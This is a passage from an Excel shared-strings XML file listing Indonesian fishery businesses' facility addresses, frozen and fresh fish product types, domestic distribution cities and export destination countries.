    <t>Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Griya Idola Industrial Blok A No.11, Jl. Raya Serang Km 12, Kel. Dukuh, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Dimsum, Cakwe, Dumpling, Siomay, Lumpia, Hakao)  </t>
  </si>
  <si>
    <t>Griya Idola Industrial Blok A No.11 Jl. Raya Serang KM.12 KP. Pabuaran, Kel. Dukuh, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Desa Serangan RT 01 RW 01, Kec. Bonang, Kabupaten Demak&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Jl. Raya Deandles Km 81.25, Kel. Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Lampung Barat, Kabupaten Tasikmalaya, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Jombang, Kabupaten Tuban, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Japan, Malaysia, Viet Nam</t>
  </si>
  <si>
    <t>Kabupaten Rembang, Kabupaten Sidoarjo, Kabupaten Jombang, Kabupaten Lamongan, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand</t>
  </si>
  <si>
    <t>Jl. Taruna No.8 RT 002 RW 004 Gudang A.3.1, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tembang, Kembung, Selar, Layang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Biji Nangka, Kerapu, Layur, Halibut, Coklatan, Beloso, Kakap, Ayam-ayam, Kurisi, Tonang, Sebelah)</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Sotong, Gurita)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Kue Ikan Vegie, Chikuwa, Sandwich Ikan, Tahu Seafood, Bar Ikan, Roll Ikan, Stik Kepiting) </t>
  </si>
  <si>
    <t>Kota Medan, Kota Padang, Kota Palembang, Kabupaten Lampung Selatan, Kota Batam, Kota Jakarta Pusat, Kabupaten Bandung, Kabupaten Cirebon, Kabupaten Purwakarta, Kabupaten Bekasi, Kota Bandung, Kabupaten Rembang, Kota Semarang, Kota Yogyakarta, Kabupaten Tulungagung, Kabupaten Lumajang, Kabupaten Banyuwangi, Kabupaten Sidoarjo, Kabupaten Jombang, Kabupaten Tuban, Kabupaten Lamongan, Kota Malang, Kota Surabaya, Kota Batu, Kota Tangerang, Kota Denpasar</t>
  </si>
  <si>
    <t>Jl. Tugu Wijaya IV No.13, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>China, Japan, Malaysia, Viet Nam</t>
  </si>
  <si>
    <t>China, Malaysia, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Australia, Japan, Malaysia, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Cabe V No. 52 A, Kel. Pondok Cabe, Kec. Pamulang , Kota Tangerang Selatan&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>American Samoa, China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Homebase Armed, Kel. Nirannuang, Kec. Bontomarannu, Kabupaten Gowa&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto, Lingkungan II, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Jl. Jendral Sudirman No.48/647, Kel. Sungai Nangka, Kec. Balikpapan Selatan, Kota Balikpapan&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Banyuwangi, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Hong Kong, Malaysia, Saudi Arabia, Singapore, Thailand</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Gresik, Kota Surabaya, Kota Banjarmasin</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Kakatua, Bawal, Kakap, Kuro, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Layur, Kakatua, Bawal, Kakap, Kuro, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemadang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kabupaten Jembrana</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Sarden, Layang, Tamban, Makerel)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Jembrana, Kota Denpasar</t>
  </si>
  <si>
    <t>Dusun Barat Sungai, Kel. Banyu Sangka, Kec. Tanjung Bumi, Kabupaten Bangkalan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Pergudangan Margomulyo Permai Blok J-12, J-12A, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Pesisir Timur RT 001 RW 001, Kel. Klatakan, Kec. Kendit, Kabupaten Situbondo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Pulau Sumatera No.13 KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Jl. Rungkut Industri III/34, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Lemadang, Salem, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Mas, Gurami, Patin, Nila)</t>
  </si>
  <si>
    <t>Bandeng Tanpa Duri Beku</t>
  </si>
  <si>
    <t>Kota Probolinggo</t>
  </si>
  <si>
    <t>Fillet Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Suriname, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Jl. Sohiri, Kel. Tuada, Kec. Jailolo, Kabupaten Halmahera Barat&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Kabupaten Probolinggo, Kota Surabaya, Kabupaten Gianyar</t>
  </si>
  <si>
    <t>Afghanistan, India, Korea, Democratic People's Republic of, Morocco, Saudi Arabia</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Tongkol, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Marlin, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kabupaten Cilacap, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Raya Wonoayu, Kel. Jimbaran Wetan, Kec. Wonoayu, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Cumi Raya No.5 Kawasan PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Desa Cilowa RT 16 RW 04, Dusun Pahing, Kec. Kramat Mulya, Kabupaten Kuningan&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Tepung Terasi Udang</t>
  </si>
  <si>
    <t>Kabupaten Mojokerto</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Layur)</t>
  </si>
  <si>
    <t>China, Hong Kong, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Dusun Sentosa, Kel. Lekopancing, Kec. Tanralili, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap, Bawal, Katamba, Kerapu)</t>
  </si>
  <si>
    <t>Australia, Hong Kong, Macao, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Kuwe, Gindara, Selar, Tenggiri, Selar Kuning)</t>
  </si>
  <si>
    <t>Jl. Sisingamangaraja No.1-2 RT 041 RW 009, Kel. Passo, Kec. Baguala, Kota Ambon&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Deho, Marlin, Layaran, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Kepiting, Kel. Dufa-Dufa, Kec. Ternate Utara, Kota Ternate&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Jl. Pattene Komp. Pergudangan Pattene Business Park Blok B/C No.11, Kel. Pabentengang, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kabupaten Bogor, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Hong Kong, Indonesia, Japan, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Baby Tuna, Tongkol, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Denpasar, Kota Manado, Kota Bitung, Kota Makassar</t>
  </si>
  <si>
    <t>Kel. Girian Bawah, Kec. Girian, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Panni, Tongkol, Deho, Kembung, Malalugis, Maesang, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Russian Federation</t>
  </si>
  <si>
    <t>Jl. Lantebung No.168, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Mexico, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Lemadang, Marlin, Layaran, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Pisang-pisang, Kerapu, Kakatua, Kakap, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>Jl. Mayjen Sutoyo No.124, Kel. Kemalaraja, Kec. Baturaja Timur, Kabupaten Ogan Komering Ulu&lt;br&gt;Sumatera Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Salem, Layang, Benggol)</t>
  </si>
  <si>
    <t>Kabupaten Ogan Komering Ulu, Kabupaten Muara Enim, Kabupaten Ogan Komering Ulu Selatan, Kabupaten Ogan Komering Ulu Timur, Kota Prabumulih, Kota Pagar Alam</t>
  </si>
  <si>
    <t>Jl. Jendral Sudirman No.2 RT 03 RW 03, Kel. Fajaresuk, Kec. Pringsewu, Kabupaten Pringsewu&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Keripik Kulit Ikan</t>
  </si>
  <si>
    <t>Jl. Gunung Tilongkabila, Kel. Biawu, Kec. Kota Selatan, Kota Gorontalo&lt;br&gt;Gorontalo</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Industri No.29 A, Kel. Sukorejo, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Canada, China, Japan, Turkey, United States</t>
  </si>
  <si>
    <t>Dusun V, Kel. Sei Lunang, Kec. Sei Kepayang Timur, Kabupaten Asahan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kabupaten Wonosobo, Kota Surakarta, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sidoarjo, Kota Surabaya, Kabupaten Tangerang, Kota Banjarmasin, Kota Samarinda</t>
  </si>
  <si>
    <t>Brunei Darussalam, Cambodia, China, Lao People's Democratic Republic, Malaysia, Myanmar, Philippines, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Terasi Udang Kering</t>
  </si>
  <si>
    <t>Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Wonosobo, Kota Surakarta, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sidoarjo, Kota Surabaya, Kabupaten Tangerang, Kota Banjarmasin, Kota Samarinda</t>
  </si>
  <si>
    <t>Jl. Cumi Raya No.3 Muara Baru, Room 305 dan 603, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Makerel Atlantik, Salem)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kota Bogor, Kota Depok, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kota Bogor, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Jl. Raya Kedungpane No.17, Semarang-Boja Km 4,3, Kel. Bringin, Kec. Ngaliyan, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Jl. Pramuka No.27B, Kel. Cibinong, Kec. Gunung Sindur, Kabupaten Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Bogor, Kabupaten Bekasi, Kota Depok, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Kabupaten Bogor</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Lele)</t>
  </si>
  <si>
    <t>Jl. Raya Lingkar Timur Komplek Pergudangan Platinum No.5A, Kel. Siwalanpanji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Lemadang, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Lemadang, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kuwe, Kerapu, Kakap, Baronang, Pogot)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kuwe, Kerapu, Kakap, Baronang, Pogot)</t>
  </si>
  <si>
    <t>Jl. Romokalisari IV No.27, Kel. Romokalisari, Kec. Benowo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Seabass)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Bandung, Kota Yogyakarta, Kota Denpasar, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Marlin, Tenggiri, Mata Besar, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Marlin, Tenggiri, Mata Besar, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kuniran, Kerapu, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok T No.12, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl. Raya Demak-Kudus Km 10 RT 002 RW 003, Kel. Gajah, Kec. Gajah, Kabupaten Demak&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Jl. Riau No. 22, Kel. Bagan Kota, Kec. Bangko, Kabupaten Rokan Hilir&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Senangin, Jenaha, Tenggiri, Parang-parang)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Bawal Hitam, Sebelah, Manyung, Kerapu, Layur, Kakap Merahi)</t>
  </si>
  <si>
    <t>Jl. Marunda Makmur No.368, Kp. Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Amberjack, Hamachi, Makerel, Salem, Saba Mackerel)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Amberjack, Hamachi, Makerel, Salem, Saba Mackerel)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kod, Flounder, Halibut, Striped Jack, Seabass, Seabrem)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kod, Flounder, Halibut, Seabream, Striped Jack, Seabass)</t>
  </si>
  <si>
    <t>Jl. AW Syaharani No.289, Kel. Air Hitam, Kec. Samarinda Ulu, Kota Samarinda&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Layur)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Kuwe, Kembung, Tenggiri)</t>
  </si>
  <si>
    <t>Australia, China, Malaysia, Singapore, United States</t>
  </si>
  <si>
    <t>Yoghurt Rumput Laut</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Bandung, Kabupaten Ciamis, Kota Bandung, Kota Cimahi, Kota Surakarta, Kota Yogyakarta</t>
  </si>
  <si>
    <t>R√©union, Spain</t>
  </si>
  <si>
    <t>Pergudangan Tiara Jabon Blok B-6 Jl. Tambak Sawah No.1, Kel. Tambak Sawah, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Kerapu, Jenaha, Kakatua, Bawal)</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kabupaten Tangerang, Kota Manado</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Philippines, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Deho, Terbang, Kembung, Lemadang)</t>
  </si>
  <si>
    <t>Jl. Tanjung Batu RT 23, Kel. Mamburungan, Kec. Tarakan Timur, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Semarang, Kota Semarang, Kabupaten Malang, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, United Arab Emirates, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Bawal, Gulama, Manyung, Kerapu, Layur, Kakap, Baronang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Amberjack, Lemuru, Tongkol, Kembung, Salem, Selar, Banjar, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Air Tawar Segar (Lele, Mas, Gurami, Betutu, Patin, Nila)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Manyung, Kerapu, Layur, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Kabupaten Malang, Kabupaten Banyuwangi, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Surabaya, Kota Batu</t>
  </si>
  <si>
    <t>Kabupaten Malang, Kabupaten Banyuwangi, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Pasuruan, Kota Surabaya, Kota Batu</t>
  </si>
  <si>
    <t>Kabupaten Malang, Kabupaten Sidoarjo, Kota Malang, Kota Surabaya, Kota Batu</t>
  </si>
  <si>
    <t>Kabupaten Malang, Kabupaten Banyuwangi, Kabupaten Sidoarjo, Kota Malang, Kota Probolinggo, Kota Pasuruan, Kota Surabaya, Kota Batu</t>
  </si>
  <si>
    <t>Kabupaten Malang, Kota Malang, Kota Surabaya, Kota Batu</t>
  </si>
  <si>
    <t>Kabupaten Malang, Kabupaten Banyuwangi, Kabupaten Gresik, Kota Malang, Kota Probolinggo, Kota Pasuruan, Kota Surabaya, Kota Batu</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gindara, Seabass)</t>
  </si>
  <si>
    <t>Kabupaten Malang, Kabupaten Sidoarjo, Kota Malang, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Raya Tandurusa, Kel. Aertembaga Dua, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Jl. Soekarno Hatta, Dusun Balong RT 003 RW 005, Kel. Gebang Ilir, Kec. Gebang, Kabupaten Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Jl. Kurau RT 15, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>China, Japan, New Zealand</t>
  </si>
  <si>
    <t>Desa Halakodanuan, Kec. Ile Mandiri, Kabupaten Flores Timur&lt;br&gt;Nusa Tenggara Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Maubara, Tembang, Kembung)</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kabupaten Pasuruan, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Marlin)</t>
  </si>
  <si>
    <t>Jl. Area Galangan Kapal, Kawasan PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Mexico, Ukraine, United Arab Emirates, United States</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan, Kaki Naga, Otak-Otak Ikan)</t>
  </si>
  <si>
    <t>Kota Padang, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Denpasar, Kota Pontianak</t>
  </si>
  <si>
    <t>Japan, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Nener 407 B, Kel. Kalianyar, Kec. Bangil, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Surakarta, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Gresik, Kota Malang, Kota Mojokerto, Kota Surabaya</t>
  </si>
  <si>
    <t>Kabupaten Semarang, Kota Surakarta, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Gresik, Kota Mojokerto, Kota Surabaya</t>
  </si>
  <si>
    <t>Kota Surakarta, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Gresik, Kota Mojokerto, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya Barat No.1 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Jl. Kalijaga No.159, Kel. Pengambiran, Kec. Lemah Wungkuk, Kabupaten Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kemusuk Kidul RT 01, Kel. Argomulyo, Kec. Sedayu, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Siomay Ikan, Otak-otak Ikan, Kaki Naga, Bakso Tahu Ikan, Pempek Ikan) </t>
  </si>
  <si>
    <t>Kota Surakarta, Kota Semarang, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta</t>
  </si>
  <si>
    <t>Trout Segar</t>
  </si>
  <si>
    <t>Jl. Gedongan Baru II No.14, Kel. Pelemwulung, Kec. Banguntapan, Kota Yogyakarta&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Surakarta, Kabupaten Bantul, Kabupaten Sleman, Kota Yogyakarta, Kota Tangerang</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Ekkado, Otak-otak Ikan, Kaki Naga, Tahu Bakso Ikan, Siomay Ikan, Lumpia Ikan, Sempol Ikan, Bakwan Ikan) </t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Bantul, Kabupaten Sleman, Kota Yogyakarta, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Jl. Gedongan Baru II No.14 , Kel. Pelemwulung, Kec. Banguntapan, Kota Yogyakarta&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Bantul, Kabupaten Sleman, Kota Yogyakarta, Kota Tangerang</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Samudera Lampulo Jl. Sisingamangaraja Ujung, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>Kota Banda Aceh, Kota Medan, Kota Jambi, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>Brunei Darussalam, Japan, Malaysia</t>
  </si>
  <si>
    <t>Jl. Gabion No.16 LK XI, Kel. Bagan Deli, Kec. Medan Belawan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Besar, Gulama, Kambing-kambing, Pisang-pisang, Layur, Bawal)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kuring, Aso-aso, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Pekanbaru, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Lencam, Kerapu, Layur, Kakatua, Bawal, Kakap, Kuro)</t>
  </si>
  <si>
    <t>Kabupaten Probolinggo, Kabupaten Pasuruan, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru)</t>
  </si>
  <si>
    <t>Kota Probolinggo, Kota Pasuruan, Kota Surabaya</t>
  </si>
  <si>
    <t>Pergudangan Sentra Kosambi Blok G-1/F, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Ceremai Ujung No.15 RT 002 RW 002, Kel. Bantarjati, Kec. Bogor Utara, Kota Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso, Naget, Siomay, Tahu Bakso, Dimsum) </t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Bogor, Kota Bogor, Kota Bekasi, Kota Depok, Kota Tangerang</t>
  </si>
  <si>
    <t>Kota Bogor</t>
  </si>
  <si>
    <t>Pattene Business Park Blok K No.2, Kel. Pattene, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Salem, Saba Mackerel)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
